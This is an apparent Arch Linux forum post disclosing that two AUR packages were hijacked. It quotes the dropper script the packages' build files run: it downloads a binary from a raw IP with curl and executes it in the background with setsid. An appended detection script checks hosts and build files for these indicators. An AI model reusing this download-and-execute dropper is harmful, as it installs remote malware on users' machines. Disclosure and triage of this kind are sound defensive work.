Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179

-----

I've noticed these two packages being "hijacked": mdbtools and materia-theme-git

Both under the same user "koolpp"

The new versions uploaded refer to a shell script available at a Codeberg repository:

https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am
https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson.build

The scripts execute the following:

```sh
#!/bin/sh
mkdir -p /usr/lib64
curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3
chmod +x /usr/lib64/libkwrk.so.1.5.3
setsid /usr/lib64/libkwrk.so.1.5.3 &
```

Looks like a remote file will create a background session with execute permissions if you install these packages.

May these new package versions be taken down
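A host-triage sketch for the indicators quoted in the post above, added here as an example and not part of the original post. The file path, IP address and package names are taken from the post; the function names, the `ROOT` argument and the generic "download plus `setsid`" heuristic are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: triage for the indicators quoted in the post (not the poster's code).
# Function names and the ROOT argument are hypothetical.
IOC_FILE="usr/lib64/libkwrk.so.1.5.3"
IOC_IP="45.94.31.147"
IOC_PKGS="mdbtools materia-theme-git"

# Print one finding per line; return 1 if anything was found under ROOT (default /).
check_host() {
    root="${1:-/}"
    found=0
    if [ -e "${root%/}/$IOC_FILE" ]; then
        echo "dropped file present: ${root%/}/$IOC_FILE"
        found=1
    fi
    # Package database and sockets only make sense on the live system.
    if [ "$root" = "/" ]; then
        if command -v pacman >/dev/null 2>&1; then
            for pkg in $IOC_PKGS; do
                if pacman -Qq "$pkg" >/dev/null 2>&1; then
                    echo "package named in the post is installed, review its build files: $pkg"
                    found=1
                fi
            done
        fi
        if command -v ss >/dev/null 2>&1 && ss -tn 2>/dev/null | grep -qF "$IOC_IP"; then
            echo "TCP connection to $IOC_IP"
            found=1
        fi
    fi
    return "$found"
}

# Flag a build file (PKGBUILD, Makefile.am, meson.build) that references the
# download host or the drop path, or that both downloads and detaches with setsid.
scan_build_file() {
    f="$1"
    if grep -qF -e "$IOC_IP" -e "libkwrk.so" "$f"; then
        echo "IOC reference in $f"; return 1
    fi
    if grep -Eq '(curl|wget)[[:space:]]' "$f" && grep -Eq 'setsid[[:space:]]' "$f"; then
        echo "download plus setsid in $f"; return 1
    fi
    return 0
}
```

Source the file, then run `check_host` on the live system or `check_host /mnt` against a mounted disk image, and `scan_build_file` over each file in a cloned AUR package before building it.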
